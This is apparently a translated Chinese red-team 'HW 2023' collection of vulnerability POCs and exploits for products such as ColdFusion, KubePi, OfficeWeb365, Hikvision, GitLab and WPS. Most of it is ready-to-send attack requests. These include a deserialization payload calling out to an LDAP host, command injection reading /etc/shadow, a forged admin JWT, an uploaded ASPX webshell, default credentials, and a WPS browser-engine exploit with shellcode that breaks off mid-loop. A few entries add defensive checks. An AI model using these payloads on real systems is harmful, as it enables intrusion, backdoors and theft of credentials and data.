2023 HW Vulnerability POC/EXP and Intelligence Knowledge Base (updated 08-20)

Any direct or indirect consequences and losses arising from the dissemination or use of the information provided in this article are the sole responsibility of the user; the author assumes no liability. The tools referenced come from the internet; verify their safety yourself. For internal study and research only.

I. 2023 HW Vulnerability POC/EXP and Intelligence Knowledge Base

1. 1Panel backend arbitrary file read vulnerability

Vulnerability description

The 1Panel admin backend has an arbitrary file read vulnerability; an attacker who can reach the backend API can use it to read sensitive files on the server.

POST /api/v1/file/loadfile {"paht":"/etc/passwd"}

2. 360 Xintianqing Terminal Security Management System information disclosure vulnerability

http://ip:port/runtime/admin_log_conf.cache

3. Adobe ColdFusion deserialization vulnerability CVE-2023-29300

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 1.2.3.4:1234
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id

argumentCollection=
<wddxPacket version='1.0'>
    <header/>
    <data>
        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>
            <var name='dataSourceName'>
                <string>ldap://xxx.xxx.xxx:1234/Basic/TomcatEcho</string>
            </var>
            <var name='autoCommit'>
                <boolean value='true'/>
            </var>
        </struct>
    </data>
</wddxPacket>

4. CODING platform idna directory listing vulnerability

CODING.net is a cloud development platform for developers that provides Git/SVN hosting and task management. The idna path under its PyPI mirror exposes a directory listing, from which an attacker can obtain directory and file information.

Search fingerprint: title="一站式软件研发管理平台"

relative: req0
session: false
requests:
  - method: GET
    timeout: 10
    path: /ci/pypi/simple/idna/
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36
    follow_redirects: true
    matches: (code.eq("200") && body.contains("Index of"))

5. Coremail mail system unauthorized access to obtain administrator credentials

POC:

/coremail/common/assets/:/:/:/:/:/:/s?

The line-wrapped `biz=...&scene=2` string that followed the POC in the source is the query string of a WeChat article link (the `__biz/mid/idx/sn/chksm/scene` parameter set of mp.weixin.qq.com), not part of the request; it is reproduced here only as the source reference:

biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626688chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2

6. Eramba arbitrary code execution vulnerability

0x01 Vulnerability details

CVE-2023-36255

  • Vulnerability type: remote code execution
  • Impact: server takeover
  • Summary: Eramba has a remote code execution vulnerability that allows an authenticated user to execute arbitrary code. The `path` parameter of the PDF test endpoint is spliced into the wkhtmltopdf command line, so a `;` in it terminates the intended command and starts the attacker's (the 500 response below shows `ip a` being run and the remainder of the original command line failing with exit status 127).

0x02 Affected versions

  • Enterprise and Community edition <= 3.19.1

GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1
Host: [redacted]
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/settings
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

HTTP/1.1 500 Internal Server Error
Date: Fri, 31 Mar 2023 12:37:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Access-Control-Allow-Origin: *
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="test.pdf"
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2033469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Error: The exit status code '127' says something went wrong:
stderr: &quot;sh: 1: --dpi: not found
&quot;
stdout: &quot;1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether [redacted] brd ff:ff:ff:ff:ff:ff
    inet [redacted] brd [redacted] scope global ens33
       valid_lft forever preferred_lft forever
    inet6 [redacted] scope link
       valid_lft forever preferred_lft forever
&quot;
command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'
--margin-right '0' --margin-top '0' --orientation 'Landscape'
--javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html'
'/tmp/knp_snappy6426d423104587.46971034.pdf'. </title>

[...]

7. GitLab path traversal arbitrary file read vulnerability

May require login.

GET /group1/group2/group3/group4/group5/group6/group7/group8/group9/project9/uploads/4e02c376ac758e162ec674399741e38d//..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

8. HIKVISION video encoding device access gateway showFile.php arbitrary file download vulnerability

<?php
// Vulnerable source as shipped: fileName is concatenated onto the log directory
// with no normalisation or containment check, so "../" walks out of it.
$file_name = $_GET['fileName'];
$file_path = '../../../log/'.$file_name;
$fp = fopen($file_path, "r");
while($line = fgets($fp)){
    $line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));
    echo '<span style="font-size:16px">'.$line.'</span>';
}
fclose($fp);
?>

/serverLog/showFile.php?fileName=../web/html/main.php
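The showFile.php code above concatenates `fileName` straight onto `../../../log/`, which is why `fileName=../web/html/main.php` escapes the log directory. The same defect underlies the 1Panel loadfile, GitLab uploads, LiveBos ShowImage.do and Milesight entries elsewhere on this page. The following is an added example, not Hikvision's code: a path-containment check in Python that canonicalises the joined path and refuses anything that resolves outside the base directory. `LOG_DIR` is an assumed base directory standing in for the gateway's log folder.

```python
import os
from typing import Optional

# Added example (not Hikvision's code). LOG_DIR is an assumed base directory
# standing in for the '../../../log/' prefix used by showFile.php.
LOG_DIR = "/var/app/log"


def resolve_under_base(base_dir: str, user_name: str) -> Optional[str]:
    """Return the canonical path of user_name inside base_dir, or None if it
    would resolve outside base_dir.

    The decision is made on the canonicalised result, not with a substring
    filter: blocking "../" alone still lets through an absolute name, "..%2F"
    once the server has URL-decoded it, or a symlink pointing out of the tree.
    """
    if not user_name or "\x00" in user_name:
        return None
    base = os.path.realpath(base_dir)
    # Treat the name as relative even if it starts with "/", so an absolute
    # path cannot replace the base inside os.path.join().
    candidate = os.path.realpath(os.path.join(base, user_name.lstrip("/")))
    # commonpath() rather than startswith(): "/var/app/log" must not accept
    # "/var/app/log2/x" as being inside it.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def safe_read_log(base_dir: str, user_name: str) -> str:
    """What the fixed viewer logic should do: resolve first, open second."""
    path = resolve_under_base(base_dir, user_name)
    if path is None:
        raise PermissionError(f"refusing path outside {base_dir}: {user_name!r}")
    with open(path, "r", encoding="utf-8", errors="replace") as fp:
        return fp.read()


if __name__ == "__main__":
    # The page's payload and two traversal variants are rejected, an absolute
    # name is re-rooted under the base, and a plain file name is accepted.
    for name in ["../web/html/main.php", "logs/../../etc/passwd",
                 "../log2/app.log", "/etc/passwd", "app.log"]:
        print(f"{name!r:28} -> {resolve_under_base(LOG_DIR, name)}")
```

`realpath()` also collapses symlinks, so a log file that is itself a link to `/etc/passwd` is rejected too; a check that only normalises the string (`os.path.normpath`) would not catch that case.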

9. HIKVISION Integrated Security Management Platform env information disclosure vulnerability

/artemis-portal/artemis/env

10. Hytec Inter HWL-2511-SS popen.cgi command injection vulnerability

title="index" && header="lighttpd/1.4.30"

/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137912

10. Jeecg-Boot Freemarker template injection vulnerability

11. KubePi JwtSigKey login bypass vulnerability (CVE-2023-22463)

Vulnerability description

KubePi ships with a hardcoded JWT signing key (JwtSigKey). Anyone who knows the key can forge an administrator token, gain management privileges on the backend and add arbitrary users.

Affected

KubePi

Network mapping (fingerprint)

"KubePi"

Request as circulated ({{Hostname}} and {{randstr}} are template placeholders):

POST /kubepi/api/v1/users HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
accept: application/json
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8

{
  "authenticate": {
    "password": "{{randstr}}"
  },
  "email": "{{randstr}}@qq.com",
  "isAdmin": true,
  "mfa": {
    "enable": false
  },
  "name": "{{randstr}}",
  "nickName": "{{randstr}}",
  "roles": [
    "Supper User"
  ]
}
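The request above works because the Bearer token is an HS256 JWT whose signing key is fixed in the KubePi build, so anyone who reads it out of the source can mint a token carrying `isAdministrator: true`. Below is an added example, not KubePi's code, that decodes the token used in the request (its header and claims are plaintext once base64url-decoded) and shows the audit step a reviewer runs to confirm a hardcoded key: verifying the signature against a list of candidate secrets. `CANDIDATE_SECRETS` and the secret used to mint the demo token are constructed for the example; KubePi's real key is not reproduced here.

```python
import base64
import hashlib
import hmac
import json
from typing import Dict, Iterable, Optional, Tuple

# Added example, not KubePi's code. PAGE_TOKEN is the Bearer token from the
# request above; CANDIDATE_SECRETS is a constructed list for the demo.
PAGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0."
    "XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8"
)
CANDIDATE_SECRETS = ["demo-secret-A", "demo-secret-B"]


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_jwt(token: str) -> Tuple[Dict, Dict]:
    """Return (header, claims) without verifying; both are readable by anyone."""
    header_b64, claims_b64, _sig_b64 = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(claims_b64))


def sign_hs256(header: Dict, claims: Dict, secret: str) -> str:
    """Mint an HS256 token: once the key is known this is the whole exploit."""
    h = _b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    c = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    mac = hmac.new(secret.encode(), f"{h}.{c}".encode(), hashlib.sha256).digest()
    return f"{h}.{c}.{_b64url_encode(mac)}"


def find_signing_secret(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the candidate secret that validates the token's signature, if any.

    Feed it the key pulled from the application source (or a wordlist of vendor
    defaults): a hit on a token issued by a live instance proves every token
    for that instance is forgeable.
    """
    header_b64, claims_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{claims_b64}".encode()
    expected = _b64url_decode(sig_b64)
    for secret in candidates:
        mac = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, expected):
            return secret
    return None


if __name__ == "__main__":
    header, claims = decode_jwt(PAGE_TOKEN)
    print("alg:", header["alg"], "| name:", claims["name"],
          "| isAdministrator:", claims["isAdministrator"])
    # The demo secrets are not KubePi's key, so the page token does not validate.
    print("page token matches a demo secret:", find_signing_secret(PAGE_TOKEN, CANDIDATE_SECRETS))
    forged = sign_hs256(header, claims, "demo-secret-B")
    print("demo token signed with:", find_signing_secret(forged, CANDIDATE_SECRETS))
```

The defensive fix is the mirror image: generate the signing key at install time (or read it from a secret store), never from a constant in the binary, and rotate it so tokens minted before the fix stop validating.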

12. Kuboard default credentials

Vulnerability description:

Kuboard is a free graphical management tool for Kubernetes that aims to help users deploy microservices on Kubernetes quickly. Kuboard ships with a default account; logging in with it gives management access to the Kubernetes cluster.

admin/kuboard123

13. LiveBos ShowImage.do imgName parameter file read vulnerability

/feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd

13. Milesight VPN server.js arbitrary file read vulnerability

POC:

GET /../etc/passwd HTTP/1.1
Host:
Accept: */*
Content-Type: application/x-www-form-urlencoded

14. Nacos-Sync

Root cause

No permission check is performed.

Affected versions: Nacos-Sync 3.0

FOFA discovery

title="nacos" && title=="Nacos-Sync"

Path

/#/serviceSync

Exploitation

Opening the path drops you straight into the management backend.

15. Path traversal risk from nginx misconfiguration

Self-check PoC: GitHub - hakaioffsec/navgix: navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities. This is not a 0-day; it is a path traversal caused by an nginx `alias` misconfiguration (a `location` prefix without a trailing slash combined with an `alias` directive), and it allows reading files on the nginx host directly. Several major financial enterprises have already been hit; self-check as soon as possible.
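navgix tests this over HTTP; the same misconfiguration can be caught in the config before deployment. The block below is an added example, not navgix's code: a small lint over an nginx config that reports prefix `location` blocks without a trailing slash whose `alias` ends in one, the combination that turns a request for `/static../` into the filesystem path `/var/www/static/../`. `SAMPLE_CONF` is a constructed config.

```python
import re
from typing import List, Tuple

# Added example (not navgix's code). SAMPLE_CONF is a constructed nginx config:
# /static is the off-by-slash case, the other three locations are safe.
SAMPLE_CONF = """
server {
    listen 80;
    location /static {
        alias /var/www/static/;
    }
    location /assets/ {
        alias /var/www/assets/;
    }
    location /img {
        alias /var/www/img;
    }
    location = /favicon.ico {
        alias /var/www/static/favicon.ico;
    }
}
"""

# location [modifier] <prefix-or-regex> { ...body without nested blocks... }
LOCATION_RE = re.compile(r"location\s+(?:(=|~\*?|\^~)\s+)?(\S+)\s*\{([^{}]*)\}")
ALIAS_RE = re.compile(r"\balias\s+([^;]+);")


def find_alias_traversal(conf: str) -> List[Tuple[str, str]]:
    """Return (prefix, alias_dir) pairs where '<prefix>../' escapes alias_dir.

    nginx replaces the matched prefix with the alias string verbatim. With
    'location /static' and 'alias /var/www/static/', the request '/static../x'
    still matches the prefix and maps to '/var/www/static/' + '../x'. The
    location must be a prefix match (no modifier, or '^~'), its prefix must
    not end in '/', and the alias must end in '/'.
    """
    findings = []
    for modifier, prefix, body in LOCATION_RE.findall(conf):
        if modifier and modifier != "^~":   # '=' and regex locations are not prefix matches
            continue
        alias = ALIAS_RE.search(body)
        if not alias:
            continue
        alias_dir = alias.group(1).strip()
        if not prefix.endswith("/") and alias_dir.endswith("/"):
            findings.append((prefix, alias_dir))
    return findings


def probe_path(prefix: str, target: str = "../") -> str:
    """The request path an HTTP probe (navgix-style) sends for a finding."""
    return prefix + target


def fixed_location(prefix: str, alias_dir: str) -> str:
    """Corrected block: both sides end in '/', so the prefix cannot be extended."""
    return f"location {prefix}/ {{\n    alias {alias_dir};\n}}"


if __name__ == "__main__":
    for prefix, alias_dir in find_alias_traversal(SAMPLE_CONF):
        print(f"off-by-slash: location {prefix} -> alias {alias_dir}")
        print("  probe:", probe_path(prefix))
        print("  fix:\n" + fixed_location(prefix, alias_dir))
```

The lint deliberately ignores `location` blocks with nested braces (e.g. an inner `if`), so treat an empty result on a complex config as "nothing found by this check", not as a clean bill of health, and still run the HTTP probe.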

16. OfficeWeb365 remote code execution vulnerability

[Message details]: 360 Vulnerability Cloud monitored a circulating report of an "OfficeWeb365 remote code execution vulnerability". After review by Vulnerability Cloud it is confirmed as a [real] vulnerability affecting [unknown] versions. The standardized POC has been uploaded to the Vulnerability Cloud intelligence platform under platform ID 360LDYLD-2023-00002453; intelligence subscribers can log in to the platform (360 Vulnerability Cloud) to view the details.

Details

The `path` parameter of SaveDraw is traversed to write the POST body into the web root as `1.aspx`. The body is an ASPX webshell that AES-ECB-decrypts its POST data with the fixed key `e45e329feb5d925b` and loads the result as an assembly via reflection (the scheme Behinder uses). The source rendered this request and the C# through a machine translator; it is restored here.

POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.434.18 Safari/537.36
Content-Length: 2265
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

data:image/png;base64,01s34567890123456789y12345678901234567m91<%@ Page Language="C#" %>
    <%@Import Namespace="System.Reflection" %>
    <script runat="server">
        private byte[] Decrypt(byte[] data)
        {
            string key = "e45e329feb5d925b";
            data = Convert.FromBase64String(System.Text.Encoding.UTF8.GetString(data));
            System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
            aes.Mode = System.Security.Cryptography.CipherMode.ECB;
            aes.Key = Encoding.UTF8.GetBytes(key);
            aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
            return aes.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
        }
        private byte[] Encrypt(byte[] data)
        {
            string key = "e45e329feb5d925b";
            System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
            aes.Mode = System.Security.Cryptography.CipherMode.ECB;
            aes.Key = Encoding.UTF8.GetBytes(key);
            aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
            return System.Text.Encoding.UTF8.GetBytes(Convert.ToBase64String(aes.CreateEncryptor().TransformFinalBlock(data, 0, data.Length)));
        }
    </script>
        <%
        //byte[] c=Request.BinaryRead(Request.ContentLength);Assembly.Load(Decrypt(c)).CreateInstance("U").Equals(this);
        byte[] c=Request.BinaryRead(Request.ContentLength);
        string asname=System.Text.Encoding.ASCII.GetString(new byte[] {0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f, 0x6e,0x2e,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79});
        Type assembly=Type.GetType(asname);
        MethodInfo load = assembly.GetMethod("Load",new Type[] {new byte[0].GetType()});
        object obj=load.Invoke(null, new object[]{Decrypt(c)});
        MethodInfo create = assembly.GetMethod("CreateInstance",new Type[] { "".GetType()});
        string name = System.Text.Encoding.ASCII.GetString(new byte[] { 0x55 });
        object pay=create.Invoke(obj,new object[] { name });
        pay.Equals(this);%>

17. Openfire authentication bypass vulnerability

GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.1

18. Panabit iXCache gateway RCE vulnerability, listed in the source as CVE-2023-38646 (that identifier is the one assigned to the Metabase pre-auth RCE, so verify the CVE mapping before relying on it)

POST /cgi-bin/Maintain/date_config HTTP/1.1
Host: 127.0.0.1:8443
Cookie: pauser_9667402_260=paonline_admin_44432_9663; pauser_9661348_661=paonline_admin_61912_96631
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp1

19. 1Panel loadfile backend file read vulnerability (same issue as entry 1)

POST /api/v1/file/loadfile {"paht":"/etc/passwd"}

20. PigCMS action_flashUpload arbitrary file upload vulnerability

POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa

------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv

<?php phpinfo();?>
------aaa--

Uploaded file path: /cms/upload/images/2023/08/11/1691722887xXbx.php

21. QAX-Vpn x traversal (enumeration) and arbitrary account password modification vulnerability

https://x.xxx.xxx.cn/admin/group/x_group.php?id=1
https://x.xxx.xxx.cn/admin/group/x_group.php?id=3
cookie: admin_id=1; gw_admin_ticket=1;

22. Smart S85F arbitrary file read

The base64 `file` value in the request below decodes to /etc/`sleep${IFS}10`.pcap, i.e. the circulated POC is a time-based command injection probe through the file parameter rather than a plain path.

GET /log/decodmail.php?file=L2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA== HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=c36d5527fd784aa29748b3b1c50be7bc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

23. WPS RCE

Affected versions: WPS Office 2023 Personal Edition < 11.1.0.15120

WPS Office 2019 Enterprise Edition < 11.8.2.12085

POC

Start an HTTP server listening on port 80 in the directory containing 1.html, and modify the hosts file (the test hardcodes the name):

127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn

The vulnerability triggers when the host name satisfies the rule clientweb.docer.wps.cn.{xxxxx}wps.cn; cloudwps.cn has no relation to wps.cn.

The code block follows. (The original PDF was obtained by adding the author on WeChat.)

<script>
if(typeof alert === "undefined"){
  alert = console.log;
}

let f64 = new Float64Array(1);
let u32 = new Uint32Array(f64.buffer);

function d2u(v) {
  f64[0] = v;
  return u32;
}

function u2d(lo, hi) {
  u32[0] = lo;
  u32[1] = hi;
  return f64[0];
}

function gc(){ // major
  for (let i = 0; i < 0x10; i++) {
    new Array(0x100000);
  }
}

function foo(bug) {
  function C(z) {
    Error.prepareStackTrace = function(t, B) {
      return B[z].getThis();
    };
    let p = Error().stack;
    Error.prepareStackTrace = null;
    return p;
  }
  function J() {}
  var optim = false;
  var opt = new Function(
    'a', 'b', 'c',
    'if(typeof a===\'number\'){if(a>2){for(var i=0;i<100;i++);return;}b.d(a,b,1);return}' +
    'g++;'.repeat(70));
  var e = null;
  J.prototype.d = new Function(
    'a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');
  J.prototype.a = new Function('a', 'a.b(0,a)');
  J.prototype.b = new Function(
    'a', 'b',
    'b.c();if(a){' +
    'g++;'.repeat(70) + '}');
  J.prototype.c = function() {
    if (optim) {
      var z = C(3);
      var p = C(3);
      z[0] = 0;
      e = {M: z, C: p};
    }
  };
  var a = new J();
  // jit optim
  if (bug) {
    for (var V = 0; 1E4 > V; V++) {
      opt(0 == V % 4 ? 1 : 4, a, 1);
    }
  }
  optim = true;
  opt(1, a, 1);
  return e;
}

e1 = foo(false);
e2 = foo(true);
delete e2.M[0];
let hole = e2.C[0];

let map = new Map();
map.set('asd', 8);
map.set(hole, 0x8);
map.delete(hole);
map.delete(hole);
map.delete("asd");
map.set(0x20, "aaaa");

let arr3 = new Array(0);
let arr4 = new Array(0);
let arr5 = new Array(1);
let oob_array = [];
oob_array.push(1.1);
map.set("1", -1);

let obj_array = {
  m: 1337, target: gc
};
let ab = new ArrayBuffer(1337);

let object_idx = undefined;
let object_idx_flag = undefined;
let max_size = 0x1000;
for (let i = 0; i < max_size; i++) {
  if (d2u(oob_array[i])[0] === 0xa72) {
    object_idx = i;
    object_idx_flag = 1;
    break;
  }
  if (d2u(oob_array[i])[1] === 0xa72) {
    object_idx = i + 1;
    object_idx_flag = 0;
    break;
  }
}

function addrof(obj_para) {
  obj_array.target = obj_para;
  let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;
  obj_array.target = gc;
  return addr;
}

function fakeobj(addr) {
  let r8 = d2u(oob_array[object_idx]);
  if (object_idx_flag === 0) {
    oob_array[object_idx] = u2d(addr, r8[1]);
  } else {
    oob_array[object_idx] = u2d(r8[0], addr);
  }
  return obj_array.target;
}

let bk_idx = undefined;
let bk_idx_flag = undefined;
for (let i = 0; i < max_size; i++) {
  if (d2u(oob_array[i])[0] === 1337) {
    bk_idx = i;
    bk_idx_flag = 1;
    break;
  }
  if (d2u(oob_array[i])[1] === 1337) {
    bk_idx = i + 1;
    bk_idx_flag = 0;
    break;
  }
}

let dv = new DataView(ab);

function get_32(addr) {
  let r8 = d2u(oob_array[bk_idx]);
  if (bk_idx_flag === 0) {
    oob_array[bk_idx] = u2d(addr, r8[1]);
  } else {
    oob_array[bk_idx] = u2d(r8[0], addr);
  }
  let val = dv.getUint32(0, true);
  oob_array[bk_idx] = u2d(r8[0], r8[1]);
  return val;
}

function set_32(addr, val) {
  let r8 = d2u(oob_array[bk_idx]);
  if (bk_idx_flag === 0) {
    oob_array[bk_idx] = u2d(addr, r8[1]);
  } else {
    oob_array[bk_idx] = u2d(r8[0], addr);
  }
  dv.setUint32(0, val, true);
  oob_array[bk_idx] = u2d(r8[0], r8[1]);
}

function write8(addr, val) {
  let r8 = d2u(oob_array[bk_idx]);
  if (bk_idx_flag === 0) {
    oob_array[bk_idx] = u2d(addr, r8[1]);
  } else {
    oob_array[bk_idx] = u2d(r8[0], addr);
  }
  dv.setUint8(0, val);
}

let fake_length = get_32(addrof(oob_array)+12);
set_32(get_32(addrof(oob_array)+8)+4,fake_length);

let wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,
  128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,
  128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,
  10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
let wasm_mod = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_mod);
let f = wasm_instance.exports.main;
let target_addr = addrof(wasm_instance)+0x40;
let rwx_mem = get_32(target_addr);
//alert("rwx_mem is"+rwx_mem.toString(16));

const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
  0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14,
  0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c,
  0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57, 0x8b,
  0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01,
  0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49,
  0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,
  0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58,
  0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01,
  0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61,
  0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d,
  0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b,
  0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd,
  0x9d, 0xff, 0xd5, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
  0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63,
  0x00]);

for(let i=0;i<shellcode.length;i++){
